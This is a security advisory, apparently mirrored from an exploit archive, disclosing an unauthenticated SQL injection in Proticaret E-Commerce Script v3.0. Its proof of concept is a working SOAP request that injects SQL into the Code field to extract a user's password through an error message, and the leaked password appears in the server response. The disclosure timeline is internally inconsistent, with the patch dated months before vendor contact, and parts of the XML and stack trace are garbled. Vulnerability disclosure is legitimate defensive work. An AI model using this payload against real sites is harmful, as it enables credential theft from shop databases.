Proticaret E-Commerce Script 3.0 - SQL Injection (2)

ID: 87120
Download vulnerable application: None
Document Title:
Proticaret E-Commerce Script v3.0 >= SQL Injection

Release Date:
13 Nov 2014

Product & Service Introduction:
Proticaret is a free e-commerce script.

Abstract Advisory Information:
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0

Vulnerability Disclosure Timeline:
20 Oct 2014    :    Contact with Vendor
20 Nov 2014    :    Vendor Response
June 26, 2014 :    Patch Released
13 Nov 2014    :    Public Disclosure

Discovery Status:

Affected Product(s):
Promist Bilgi İletişim Teknolojileri A.Ş
Product: Proticaret E-commerce Script v3.0 >=

Exploitation Technique:
Remote, Unauthenticated

Severity Level:

Technical Details & Description:
SQL Injection

Proof of Concept (PoC):
Proof of Concept

<soapenv:Envelope xmlns:soapenv="" xmlns:tem="">
        <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1-    -</tem:Code>


<soap:Envelope xmlns:soap="" xmlns:xsi="" xmlns:xsd="">

<faultstring>System.Web.Services.Protocols.SoapException: Server 
was unable to process request. ---> 
System.Data.SqlClient.SqlException: Conversion failed when converting 
the nvarchar value 'secretpassword' to data type int.
  at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)

at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException 
exception, Boolean breakConnection, Action`1 wrapCloseInAction)

stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, 
SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet
bulkCopyHandler, TdsParserStateObject stateObj, Boolean& 
  at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
  at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
  at System.Data.SqlClient.SqlDataReader.Read()
  at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
  --- End of inner exception stack trace ---</faultstring>

Solution Fix & Patch:
Apply the patch for v3.0

Security Risk:
The risk of the vulnerabilities above estimated as critical.

Credits & Authors:
Bilgi Güvenliği Akademisi

Disclaimer & Information:
information provided in this advisory is provided as it is without any 
warranty. BGA disclaims all  warranties, either expressed or implied, 
including the warranties of merchantability and capability for a 
particular purpose. BGA or its suppliers are not liable in any case of 
damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages.

Contact:    [email protected]

Copyright © 2014 | BGA
1-4-2 (www02)